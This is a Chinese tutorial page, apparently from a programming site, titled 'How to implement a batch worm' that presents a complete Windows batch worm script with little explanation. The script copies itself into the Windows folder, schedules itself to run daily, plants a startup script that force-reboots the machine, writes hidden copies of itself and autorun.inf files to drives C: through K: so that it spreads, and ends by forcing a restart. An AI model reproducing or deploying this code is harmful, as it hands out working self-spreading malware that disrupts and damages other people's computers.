n"/>

文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

如何实现批处理蠕虫bat

2023-06-09 22:47

关注

这篇文章主要介绍了如何实现批处理蠕虫bat,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。

代码如下:

@echo off  attrib -r -h -s "%~nx0" 2>nul >nul  attrib -r -h -s %windir%\"%~nx0" 2>nul >nul  copy "%~nx0" %windir% /y 2>nul >nul  at 9:20 /every:m,t,w,th,f,s,su "%windir%\%~nx0"  echo reboot>%windir%\temp.dll  set pat=「开始」菜单\程序\启动  echo @echo off>"%ALLUSERSPROFILE%\%pat%"\reboot.bat  echo echo reboot^>^>%%windir%%\temp.dll>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat  echo find /c "reboot" %%windir%%\temp.dll^|find "11">>"%ALLUSERSPROFILE%\%pat%"\reboot.bat  echo if errorlevel 1 goto rebootnow>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat  echo del %%windir%%\user.dll /f /q>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat  echo del %%windir%%\temp.dll /f /q>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat  echo del /f /q "%%~nx0">>"%ALLUSERSPROFILE%\%pat%"\reboot.bat  echo exit>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat  echo :rebootnow>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat  echo shutdown /r /t 0 /f>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat  echo exit>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat  echo [autorun]>%windir%\user.dll  echo shellexecute=%~nx0>>%windir%\user.dll  set disk=C:>nul 2>nul  :auto  copy %windir%\"%~nx0" %disk%\ /y 2>nul >nul  copy %windir%\user.dll %disk%\autorun.inf /y 2>nul >nul  attrib +s +h +r %disk%\%~nx0 2>nul >nul  attrib +s +h +r %disk%\autorun.inf 2>nul >nul  cls  goto %disk%>nul 2>nul  :C:  set disk=D:>nul 2>nul  goto auto>nul 2>nul  : D: set disk=E:>nul 2>nul  goto auto>nul 2>nul  :E:  set disk=F:>nul 2>nul  goto auto>nul 2>nul  :F:  set disk=G:>nul 2>nul  goto auto>nul 2>nul  :G:  set disk=H:>nul 2>nul  goto auto>nul 2>nul  :H:  set disk=I:>nul 2>nul  goto auto>nul 2>nul  :I:  set disk=J:>nul 2>nul  goto auto>nul 2>nul  :J:  set disk=K:>nul 2>nul  goto auto>nul 2>nul  :K:  set disk=L:>nul 2>nul  goto auto>nul 2>nul  : L: cls  attrib +s +h +r %windir%\%~nx0 2>nul >nul  shutdown /r /t 0 /f  exit

感谢你能够认真阅读完这篇文章,希望小编分享的“如何实现批处理蠕虫bat”这篇文章对大家有帮助,同时也希望大家多多支持编程网,关注编程网行业资讯频道,更多相关知识等着你来学习!

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯